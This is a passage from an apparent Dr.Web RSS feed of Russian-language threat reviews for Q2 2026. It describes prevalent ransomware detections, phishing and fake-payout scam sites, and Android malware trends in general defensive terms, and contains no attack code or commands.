&lt;p&gt;Наиболее распространенные энкодеры II квартала 2026 года&lt;/p&gt;

&lt;ul class="list"&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 14,47% обращений пользователей&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; — 5,26% обращений пользователей&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.37400&lt;/b&gt; — 3,95% обращений пользователей&lt;/li&gt;
   &lt;li&gt;&lt;a href="https://vms.drweb.ru/search/?q=Trojan.Encoder.35209&amp;lng=ru"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt; — 3,29% обращений пользователей&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.44197&lt;/b&gt; — 2,63% обращений пользователей&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;Сетевое мошенничество&lt;/h3&gt;

&lt;p&gt;Одной из тенденций, которую интернет-аналитики «Доктор Веб» наблюдали во II квартале 2026 года, стало то, что на фоне роста аудитории российского мессенджера MAX злоумышленники начали активнее атаковать пользователей данного сервиса. При этом они применяют известные схемы, которые ранее были ориентированы на пользователей других мессенджеров, таких как Telegram и WhatsApp. Например, наши специалисты выявили множество мошеннических сайтов, созданных с целью кражи учетных записей MAX под прикрытием различных голосований. Потенциальной жертве предлагается проголосовать в том или ином конкурсе, но для этого от нее требуется войти в учетную запись, указав номер мобильного телефона и поступивший после его ввода проверочный код. Когда пользователь вводит все данные, атакующие получают доступ к его аккаунту.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/04_fake_max_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/04_fake_max_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Пример одного из фишинговых сайтов, с помощью которого мошенники получают доступ к учетной записи мессенджера MAX жертвы&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;В течение II квартала интернет-аналитики «Доктор Веб» отмечали появление очередных мошеннических сайтов, связанных с инвестициями. При этом киберпреступники следуют современным тенденциям и продолжают активно эксплуатировать тематику искусственного интеллекта. Например, на некоторых интернет-ресурсах они предлагали потенциальным жертвам присоединиться к новому инвестиционному проекту, якобы имеющему отношение к крупным российским кредитным организациям. Злоумышленники обещали доступ к специализированному чат-боту на основе нейросети ChatGPT, помогающему в инвестировании. Чтобы стать участниками «проекта», посетители сайта должны были пройти регистрацию, указав персональную информацию.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/05_fake_invest_gptbot_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/05_fake_invest_gptbot_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Мошеннический сайт предлагает зарегистрироваться в инвестиционном проекте, якобы имеющем отношение к одному из российских банков, и получить доступ к специализированному финансовому чат-боту на основе нейросети ChatGPT&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;В то же время мошенники пытались привлечь русскоязычных пользователей не только именами российских банков, но и иностранных кредитных организаций. Например, ряд веб-сайтов псевдоинвестиционных сервисов киберпреступники преподносили как имеющие отношение к южнокорейским банкам.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/06_fake_korean_invest_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/06_fake_korean_invest_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Один из мошеннических сайтов, предлагавший русскоговорящим пользователям стать участниками некоего инвестиционного проекта одного из южнокорейских банков и обещавший доход от 2 000 000 южнокорейских вон&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Во II квартале сохранялась активность мошенников, которые пытались украсть данные учетных записей от различных сервисов. Так, среди множества фишинговых сайтов встречались поддельные интернет-ресурсы транспортных компаний. Один из них был нацелен на клиентов одной из российских служб экспресс-доставки. Потенциальным жертвам предлагалось войти в свою учетную запись по номеру мобильного телефона, привязанному к аккаунту, либо авторизоваться через Госуслуги. При этом даже после «входа» в учетную запись первым способом сайт все равно демонстрировал вторую фишинговую форму под видом авторизации с использованием Госуслуг.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/07_fake_transport_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/07_fake_transport_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/08_fake_gos_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/08_fake_gos_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;С помощью мошеннического сайта злоумышленники могли похищать данные сразу нескольких учетных записей — от личного кабинета на сайте транспортной компании и от портала Госуслуги&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Наши эксперты также выявляли новые фишинговые веб-сайты кредитных организаций различных стран. Так, вкладчикам одного из банков США мошенники предлагали войти в учетную запись и проверить доступность повышенной процентной ставки для «лояльных клиентов»:&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/09_fake_usa_bank_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/09_fake_usa_bank_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/10_fake_usa_banklogin_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/10_fake_usa_banklogin_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;В другом случае фишинговый сайт имитировал внешний вид одного из эквадорских банков и запрашивал у пользователей логин и пароль от учетной записи онлайн-банка:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/11_fake_ecuador_bank_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/11_fake_ecuador_bank_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Еще одна фишинговая схема была ориентирована на британских пользователей. Киберпреступники создавали поддельные сайты государственных сервисов, где предлагали уплатить штраф за неправильную парковку.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/12_fake_uk_parking1_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/12_fake_uk_parking1_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;У потенциальных жертв запрашивалась подробная персональная информация — якобы для проверки личности, после чего те перенаправлялись на страницу оплаты «штрафа».&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/13_fake_uk_parking2_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/13_fake_uk_parking2_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/14_fake_uk_parking3_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/14_fake_uk_parking3_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Одной из распространенных мошеннических схем остается получение гражданами тех или иных безвозмездных выплат. Однако киберпреступники постоянно адаптируют ее к текущим событиям. Так, в преддверии празднования Дня России стали появляться поддельные сайты российских кредитных организаций, где посетителям злоумышленники обещали праздничные выплаты. На одном из них пользователям за прохождение опроса якобы полагалось от 5 000 до 300 000 рублей:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/15_fake_russia_pay_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/15_fake_russia_pay_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;В другом варианте схемы пользователи после прохождения опроса якобы могли рассчитывать на получение «помощи» в размере 5 000 рублей:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/16_fake_russia_help_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/16_fake_russia_help_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;А на фоне спекулятивных сообщений о нехватке топлива в некоторых российских регионах ряд таких сайтов обещал ваучеры на бесплатное получение от 20 до 100 литров горючего:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/17_fake_russia_fuel_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/17_fake_russia_fuel_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;После того как посетители этих сайтов отвечали на несколько простых вопросов, им для получения обещанной награды предлагалось пройти «идентификацию личности». Для этого требовалось указать имя и фамилию, номер мобильного телефона, а также номер банковской карты. В дальнейшем мошенники могли использовать эту информацию, чтобы похитить деньги жертв.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/18_fake_russia_payoutcard_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/18_fake_russia_payoutcard_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/19_fake_russia_payoutdata_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/19_fake_russia_payoutdata_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Среди выявленных во II квартале нежелательных сайтов также встречались поддельные интернет-порталы Международной Федерации Футбола FIFA, на которых пользователи якобы могли официально приобрести билеты на матчи Чемпионата мира по футболу 2026 года, фирменные сувенирные товары, а также различные премиум-услуги. Как и на настоящем сайте, посетителям этих подделок предлагалось войти в учетную запись FIFA ID, однако форма для ввода логина и пароля в данном случае принимала любые данные.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/20_fake_fifaid_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/20_fake_fifaid_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Поддельная форма входа в учетную запись FIFA ID&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;После того как любители футбола выбирали интересующий их товар, им предлагалось оформить покупку и произвести оплату. При этом в процессе оплаты пользователи попадали на сайт одного из сервисов, который находится в базе интернет-ресурсов, не рекомендуемых антивирусом Dr.Web.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/21_fake_fifa_purchase_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/21_fake_fifa_purchase_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/22_fake_fifa_pay_q_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/22_fake_fifa_pay_q_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Поддельный сайт Международной Федерации Футбола якобы позволял официально приобретать лицензированные продукты и сервисы&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Наши эксперты также зафиксировали ряд спам-кампаний, направленных на распространение ссылок на поддельные сайты российских маркетплейсов, где злоумышленники предлагали потенциальным жертвам принять участие в «юбилейном розыгрыше призов». Мошенники обещали возможность получить как денежные призы — вплоть до 1 000 000 рублей, так и компьютерную и мобильную технику:&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/23_fake_marketplace_prize1_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/23_fake_marketplace_prize1_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/24_fake_marketplace_prize2_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/24_fake_marketplace_prize2_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Для участия в «акции» пользователи должны были нажать соответствующую кнопку на таких сайтах, после чего на них имитировался процесс розыгрыша призов. После нескольких попыток потенциальной жертве сообщалось, что она выиграла несколько подарков, и у нее якобы есть возможность выбора: получить сами призы — в пункте выдачи маркетплейса, или же их денежный эквивалент — переводом на банковский счет:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/25_fake_marketplace_prize3_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/25_fake_marketplace_prize3_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;При выборе опции получения призов в пункте выдачи сайты сообщали, что необходимые товары закончились на складе, но пользователь якобы все еще может обменять их на деньги. После этого на странице имитировался чат с оператором для «подтверждения» намерения конвертировать призы. Для этого потенциальная жертва должна была указать номер банковской карты:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/26_fake_marketplace_prize4_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/26_fake_marketplace_prize4_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;После его ввода сайты запрашивали оплату государственной пошлины — для «официального оформления выигрыша»:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/27_fake_marketplace_prize5_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/27_fake_marketplace_prize5_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Никаких призов жертвы мошенников на самом деле не получали. Они не только передавали им данные своих банковских карт, но и отдавали собственные деньги.&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="https://antifraud.drweb.ru/dangerous_urls/"&gt;Узнайте больше о нерекомендуемых антивирусом Dr.Web сайтах&lt;/a&gt;
&lt;/div&gt;

&lt;h3&gt;Вредоносное и нежелательное ПО для мобильных устройств&lt;/h3&gt;

&lt;p&gt;По данным статистики детектирований Dr.Web Security Space для мобильных устройств, во II квартале 2026 года пользователи стали реже сталкиваться с банковскими троянами &lt;a href="https://vms.drweb.ru/search/?q=Android.Banker&amp;lng=ru"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;, однако эти троянские приложения остались самым распространенным вредоносным ПО. Также наблюдалось очередное снижение активности рекламных троянов &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Android.MobiDash&amp;lng=ru"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Наиболее часто детектируемыми потенциально опасными программами во II квартале стали приложения &lt;a href="https://vms.drweb.ru/search/?q=Tool.Obfuscator.TrashCode&amp;lng=ru"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Tool.NPMod&amp;lng=ru"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;, модифицированные при помощи утилиты для моддинга NP Manager. Вирусописатели используют этот инструмент для защиты вредоносного ПО от обнаружения антивирусами. Самыми распространенными нежелательными программами оказались поддельные антивирусы &lt;a href="https://vms.drweb.ru/search/?q=Program.FakeAntiVirus&amp;lng=ru"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;. Для «лечения» якобы найденных угроз они требуют приобрести полную версию.&lt;/p&gt;

&lt;p&gt;Наиболее активным рекламным ПО стали модули &lt;a href="https://vms.drweb.ru/search/?q=Adware.AdPush&amp;lng=ru"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;, которые демонстрируют вводящие в заблуждение уведомления и собирают конфиденциальные данные. Распространение вновь получили приложения-оптимизаторы работы ОС Android &lt;a href="https://vms.drweb.ru/search/?q=Adware.Bastion&amp;lng=ru"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;. Они создают уведомления с сообщениями о якобы нехватке оперативной памяти и ошибках системы, чтобы показывать рекламу во время «оптимизации». Высокую активность сохранили и рекламные программы &lt;b&gt;Adware.Opensite.15&lt;/b&gt;. Злоумышленники распространяют их под видом чит-программ, с помощью которых пользователи якобы могут получить различные внутриигровые ресурсы. В действительности эти программы лишь загружают сайты с рекламой.&lt;/p&gt;

&lt;p&gt;В июне специалисты компании «Доктор Веб» &lt;a href="https://news.drweb.ru/show/?i=15262" target="_blank"&gt;предупредили&lt;/a&gt; о трояне &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, способном обходить ограничения ОС Android и демонстрировать рекламу в фоновом режиме. &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; использует для этого сторонние приложения, а также ряд методик, которые он выбирает в зависимости от производителя целевого устройства.&lt;/p&gt;

&lt;p&gt;В течение II квартала наши вирусные аналитики выявили в каталоге Google Play очередные троянские программы семейств &lt;a href="https://vms.drweb.ru/search/?q=Android.Joker&amp;lng=ru"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Android.Subscription&amp;lng=ru"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;, подписывающие пользователей на платные сервисы. Суммарно они были загружены не менее 2 600 000 раз.&lt;/p&gt;

&lt;p&gt;Наиболее заметные события, связанные с «мобильной» безопасностью во II квартале&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;Банковские трояны &lt;a href="https://vms.drweb.ru/search/?q=Android.Banker&amp;lng=ru"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; сохранили лидерство по числу детектирований вредоносного ПО на защищаемых Dr.Web устройствах.&lt;/li&gt;
    &lt;li&gt;Злоумышленники продолжили активно применять специализированные инструменты для моддинга Android-программ с целью защиты банковских троянов от обнаружения антивирусами.&lt;/li&gt;
    &lt;li&gt;Активность рекламных троянов &lt;a href="https://vms.drweb.ru/search/?q=Android.MobiDash&amp;lng=ru"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; вновь снизилась.&lt;/li&gt;
    &lt;li&gt;Вирусные аналитики «Доктор Веб» выявили трояна &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, который эксплуатирует сторонние программы для обхода ограничений ОС Android и демонстрации рекламы в фоновом режиме.&lt;/li&gt;
    &lt;li&gt;В каталоге Google Play были обнаружены новые троянские приложения, подписывающие пользователей на платные услуги.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Более подробно о вирусной обстановке для мобильных устройств во II квартале 2026 года читайте в &lt;a href="https://news.drweb.ru/show/review/?lng=ru&amp;i=15274" target="_blank"&gt;нашем обзоре&lt;/a&gt;.&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15274&amp;lng=ru</guid><title>«Доктор Веб»: обзор вирусной активности для мобильных устройств во II квартале 2026 года</title><link>https://news.drweb.ru/show/?i=15274&amp;lng=ru&amp;c=5</link><pubDate>Wed, 01 Jul 2026 06:00:00 GMT</pubDate><description>&lt;div class="vir_rev_btn center justify-center"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/review_mobile_q2_2026_ru.pdf" class='btn'&gt;Скачать PDF&lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;1 июля 2026 года&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Согласно данным статистики детектирований Dr.Web Security Space для мобильных устройств, во II квартале 2026 года наблюдалось снижение активности банковских троянов &lt;a href="https://vms.drweb.ru/search/?q=Android.Banker&amp;lng=ru"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; — на 31,83% по сравнению с I кварталом. Вместе с тем, они остались самым распространенным вредоносным ПО для Android: на это семейство пришлось 23,28% детектирований соответствующего типа угроз. Эти вредоносные программы похищают различные конфиденциальные данные, такие как СМС с одноразовыми кодами от кредитных организаций, логины и пароли от учетных записей интернет-банка, а также могут демонстрировать фишинговые окна. Как и кварталом ранее, пользователи чаще всего сталкивались с подсемейством Android.Banker.Mamont, включающим различные вредоносные приложения.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;В течение минувших трех месяцев продолжалось снижение активности рекламных троянов семейств &lt;a href="https://vms.drweb.ru/search/?q=Android.MobiDash&amp;lng=ru"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;. При этом они все еще являются одними из наиболее часто встречающихся вредоносных Android-приложений, и отдельные их модификации по-прежнему находятся среди лидеров по количеству детектирований вредоносного ПО.&lt;/p&gt;

&lt;p&gt;Самым распространенным потенциально опасным ПО с долей свыше 66% вновь стали программы, в которые для запутывания логики добавлен мусорный код (они детектируются как &lt;a href="https://vms.drweb.ru/search/?q=Tool.Obfuscator.TrashCode&amp;lng=ru"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;). Такая модификация выполняется при помощи хакерских инструментов для моддинга NP Manager. В том числе их применяют и злоумышленники — для защиты вредоносных программ, таких как банковские трояны &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;, от обнаружения антивирусами.&lt;/p&gt;

&lt;p&gt;На втором месте остались приложения, которые также модифицируются при помощи утилиты NP Manager, но с использованием других ее функциональных возможностей. Например, в этом инструменте предусмотрены различные модули для защиты и обфускации кода программ, а также для обхода проверки их цифровой подписи после того, как приложения были модифицированы. Вирусописатели используют данную функциональность для защиты вредоносного ПО от антивирусов. Антивирусные продукты Dr.Web детектируют измененные таким образом программы как &lt;a href="https://vms.drweb.ru/search/?q=Tool.NPMod&amp;lng=ru"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Среди наиболее распространенных потенциально опасных приложений вновь оказались и программы, модифицированные при помощи утилиты &lt;a href="https://vms.drweb.ru/search/?q=Tool.LuckyPatcher&amp;lng=ru"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;. Для их модификации утилита загружает из интернета специально подготовленные скрипты.&lt;/p&gt;

&lt;p&gt;Самыми активными нежелательными программами во II квартале стали приложения &lt;a href="https://vms.drweb.ru/search/?q=Program.FakeAntiVirus&amp;lng=ru"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;, имитирующие работу антивирусов. Они якобы выявляют те или иные угрозы и затем предлагают приобрести полную версию для «борьбы» с ними. На долю таких подделок пришлось более 44% нежелательного ПО, выявленного на Android-устройствах.&lt;/p&gt;

&lt;p&gt;Наиболее распространенным рекламным ПО стали модули &lt;a href="https://vms.drweb.ru/search/?q=Adware.AdPush&amp;lng=ru"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;, которые могут быть встроены в Android-приложения. Они демонстрируют рекламные уведомления, вводящие пользователей в заблуждение. Эти модули также собирают различные конфиденциальные данные. Кроме того, пользователи продолжали сталкиваться с программами-оптимизаторами &lt;a href="https://vms.drweb.ru/search/?q=Adware.Bastion&amp;lng=ru"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;. Они периодически создают уведомления с вводящими в заблуждение сообщениями о якобы возникающих ошибках системы и нехватке оперативной памяти. Эти приложения демонстрируют рекламу во время «оптимизации». Высокую активность вновь проявили и рекламные программы &lt;b&gt;Adware.Opensite.15&lt;/b&gt;. Злоумышленники выдают их за приложения с читами, которые якобы позволяют получать ресурсы в играх, но на самом деле программы только загружают сайты с объявлениями.&lt;/p&gt;

&lt;p&gt;В начале июня специалисты компании «Доктор Веб» сообщили об &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; — трояне, способном обходить ограничения ОС Android и показывать рекламу в фоновом режиме. Для этого &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; эксплуатирует сторонние приложения, а также использует определенные методики, которые выбирает на основе производителя зараженного устройства. Подробнее об этом трояне рассказано в соответствующем &lt;a href="https://news.drweb.ru/show/?i=15262" target="_blank"&gt;материале&lt;/a&gt; на нашем сайте.&lt;/p&gt;

&lt;p&gt;В течение II квартала вирусные аналитики «Доктор Веб» обнаружили в каталоге Google Play очередные вредоносные программы, подписывающие жертв на платные услуги. Среди них были представители семейств &lt;a href="https://vms.drweb.ru/search/?q=Android.Subscription&amp;lng=ru"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Android.Joker&amp;lng=ru"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Главные тенденции II квартала&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Банковские трояны &lt;a href="https://vms.drweb.ru/search/?q=Android.Banker&amp;lng=ru"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; остались самыми распространенными вредоносными программами для ОС Android.&lt;/li&gt;
        &lt;li&gt;Вирусописатели продолжили активно использовать инструменты для моддинга Android-программ, чтобы защитить банковские трояны от детектирования антивирусами.&lt;/li&gt;
        &lt;li&gt;Активность рекламных троянов &lt;a href="https://vms.drweb.ru/search/?q=Android.MobiDash&amp;lng=ru"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; вновь снизилась.&lt;/li&gt;
        &lt;li&gt;Обнаружен троян &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, использующий сторонние приложения для обхода ограничений ОС Android и показа рекламы в фоне.&lt;/li&gt;
        &lt;li&gt;Появились новые вредоносные программы в каталоге Google Play.&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;По данным Dr.Web Security Space для мобильных устройств&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/01_malware_q2_2026_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/01_malware_q2_2026_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

